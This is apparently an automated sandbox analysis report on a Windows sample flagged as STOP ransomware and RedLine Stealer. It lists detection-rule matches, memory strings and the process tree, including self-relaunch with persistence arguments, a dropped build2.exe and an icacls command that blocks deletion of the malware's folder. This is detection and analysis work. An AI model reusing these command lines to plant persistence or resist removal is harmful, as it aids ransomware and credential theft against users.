          Source: 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000013.00000002.1480717664.0000000002220000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.1229632028.000000000210A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000005.00000002.1259211978.0000000002191000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000E.00000002.1337203091.0000000000613000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000010.00000002.1396247343.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000007.00000002.1281218697.00000000021EC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000010.00000002.1396092772.0000000000668000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: Process Memory Space: E0tabE4K4r.exe PID: 6708, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: E0tabE4K4r.exe PID: 412, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: E0tabE4K4r.exe PID: 5172, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: E0tabE4K4r.exe PID: 6744, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: E0tabE4K4r.exe PID: 5296, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: E0tabE4K4r.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: E0tabE4K4r.exe PID: 7580, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: E0tabE4K4r.exe PID: 7636, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: E0tabE4K4r.exe PID: 7868, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: E0tabE4K4r.exe PID: 7888, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: E0tabE4K4r.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: E0tabE4K4r.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: build2.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: build2[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@22/1312@8/5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,2_2_00411900
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0210A7C6 CreateToolhelp32Snapshot,Module32First,0_2_0210A7C6
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,2_2_0040D240
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8Jump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --Admin2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: IsAutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: IsTask2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --ForNetRes2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: IsAutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: IsTask2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --Task2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --AutoStart2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --Service2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: X1P2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --Admin2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: runas2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: x2Q2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: x*P2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: C:\Windows\2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: D:\Windows\2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: 7P2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: %username%2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: F:\2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --Admin6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: IsAutoStart6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: IsTask6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --ForNetRes6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: IsAutoStart6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: IsTask6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --Task6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --AutoStart6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --Service6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: X1P6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: --Admin6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: runas6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: x2Q6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: x*P6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: C:\Windows\6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: D:\Windows\6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: 7P6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: %username%6_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCommand line argument: F:\6_2_00419F90
          Source: E0tabE4K4r.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: build2.exe, 0000000F.00000002.2496929339.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2493598451.0000000003871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: build2.exe, 0000000F.00000002.2496929339.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2493598451.0000000003871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
          Source: build2.exe, 0000000F.00000002.2496929339.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2493598451.0000000003871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
          Source: build2.exe, 0000000F.00000002.2496929339.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2493598451.0000000003871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
          Source: build2.exe, 0000000F.00000002.2496929339.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2493598451.0000000003871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
          Source: build2.exe, 0000000F.00000002.2496929339.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2493598451.0000000003871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
          Source: build2.exe, 0000000F.00000002.2496929339.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2493598451.0000000003871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
          Source: build2.exe, 0000000F.00000003.1460922205.00000000097F7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.1472629738.0000000009813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: build2.exe, 0000000F.00000002.2496929339.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2493598451.0000000003871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
          Source: build2.exe, 0000000F.00000002.2496929339.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2493598451.0000000003871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
          Source: E0tabE4K4r.exeReversingLabs: Detection: 89%
          Source: E0tabE4K4r.exeString found in binary or memory: set-addPolicy
          Source: E0tabE4K4r.exeString found in binary or memory: id-cmc-addExtensions
          Source: E0tabE4K4r.exeString found in binary or memory: set-addPolicy
          Source: E0tabE4K4r.exeString found in binary or memory: id-cmc-addExtensions
          Source: E0tabE4K4r.exeString found in binary or memory: set-addPolicy
          Source: E0tabE4K4r.exeString found in binary or memory: id-cmc-addExtensions
          Source: E0tabE4K4r.exeString found in binary or memory: id-cmc-addExtensions
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile read: C:\Users\user\Desktop\E0tabE4K4r.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\E0tabE4K4r.exe C:\Users\user\Desktop\E0tabE4K4r.exe
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\Desktop\E0tabE4K4r.exe C:\Users\user\Desktop\E0tabE4K4r.exe
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\Desktop\E0tabE4K4r.exe "C:\Users\user\Desktop\E0tabE4K4r.exe" --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\Desktop\E0tabE4K4r.exe "C:\Users\user\Desktop\E0tabE4K4r.exe" --Admin IsNotAutoStart IsNotTask
          Source: unknownProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe --Task
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe --Task
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe "C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe"
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeProcess created: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe "C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
          Source: unknownProcess created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart
